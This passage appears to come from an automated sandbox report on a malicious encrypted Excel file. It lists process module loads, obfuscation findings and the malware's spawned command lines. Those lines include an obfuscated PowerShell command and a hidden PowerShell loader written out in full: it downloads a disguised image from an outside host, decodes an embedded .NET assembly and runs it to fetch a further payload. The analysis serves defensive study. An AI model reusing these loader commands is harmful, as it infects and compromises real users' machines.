Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Automated click: OK
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\chrome_BITS_1864_259209375 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.568213344.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 00000012.00000002.568213344.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: ~WRF{22E766A3-CA3D-4B6F-BED5-FF71E53845DC}.tmp.4.dr Initial sample: OLE indicators vbamacros = False
Source: INQUIRY#46789.xla.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFBK/0209/69.242.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'sabelianos','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFBK/0209/69.242.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'sabelianos','RegAsm',''))} }" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 28_2_0041CB50
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00292DC9 push ebx; ret 18_2_00292DEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00290EB8 push ebx; ret 18_2_00290ECA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00457106 push ecx; ret 28_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0045B11A push esp; ret 28_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0045E54D push esi; ret 28_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00457A28 push eax; ret 28_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00434E56 push ecx; ret 28_2_00434E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10002806 push ecx; ret 28_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044693D push ecx; ret 29_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044DB70 push eax; ret 29_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044DB70 push eax; ret 29_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00451D54 push eax; ret 29_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0044B090 push eax; ret 30_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0044B090 push eax; ret 30_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00451D34 push eax; ret 30_2_00451D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00444E71 push ecx; ret 30_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00414060 push eax; ret 31_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00414060 push eax; ret 31_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00414039 push ecx; ret 31_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004164EB push 0000006Ah; retf 31_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00416553 push 0000006Ah; retf 31_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00416555 push 0000006Ah; retf 31_2_004165C4

Persistence and Installation Behavior
barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
